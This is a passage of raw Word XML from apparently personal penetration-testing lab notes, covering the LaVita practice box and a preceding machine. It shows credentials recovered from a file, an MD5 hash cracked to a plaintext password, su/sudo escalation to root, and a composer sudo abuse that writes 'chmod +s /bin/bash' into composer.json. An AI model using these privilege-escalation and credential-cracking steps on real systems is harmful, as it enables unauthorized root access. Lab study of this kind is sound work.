        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When it asks for passphrase, use the one you found:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>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xinyVzoH2AnJpRK9sfMgBA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then prints the content into terminal using "--stdout"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This output included two credentials near the bottom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>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3670300" cy="406400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="122" name="image136.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image136.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId663"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="36703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1F3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>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amy : 0814b6b7f0de51ecf54ca5b6e6e612bf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="279400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="151" name="image141.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image141.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId664"/>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1F3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>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andrew : Rb9kNokjDsjYyH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We were  supposed to use switch users on this machine to amy. But when I tried her password, it failed. And it looks encoded. So I first used a hash identifier and then cracked it after I realized it's MD5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId665">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hashes.com/en/tools/hash_identifier</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to identify hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId666">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crackstation.net/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to crack it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> backups1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>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su amy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type in password:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backups1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then checking sudo -l, we have all permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>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sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are now root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And for Andrew's credentials, we just SSH into 172.16.xxx.20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xnqz3wdljgu4" w:id="269"/>
      <w:bookmarkEnd w:id="269"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/composer </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId667">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LaVita</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice and we saw we had sudo privs for /usr/bin/composer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2603500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="505" name="image511.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image511.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66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F51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="523"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/composer -working-dir\=/var/ww/html/lavita *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see there is an entry in GTFOBins, but we need to do a little bit of stuff on our own first, like creating a malicious .json file to replace the original composer.json file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/html/lavita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the directory where composer.json is supposed to be, according to the sudo command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv composer.json composer.json.original</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename the original composer.json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '{"scripts":{"x":"chmod +s /bin/bash"}}' &gt; composer.json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This adds the SUID bit to /bin/bash since this runs as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u root /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the command from GTFOBins but modified to match our situation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now check /bin/bash and get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F61">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_koeioe15l8m2" w:id="270"/>
      <w:bookmarkEnd w:id="270"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/systemctl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
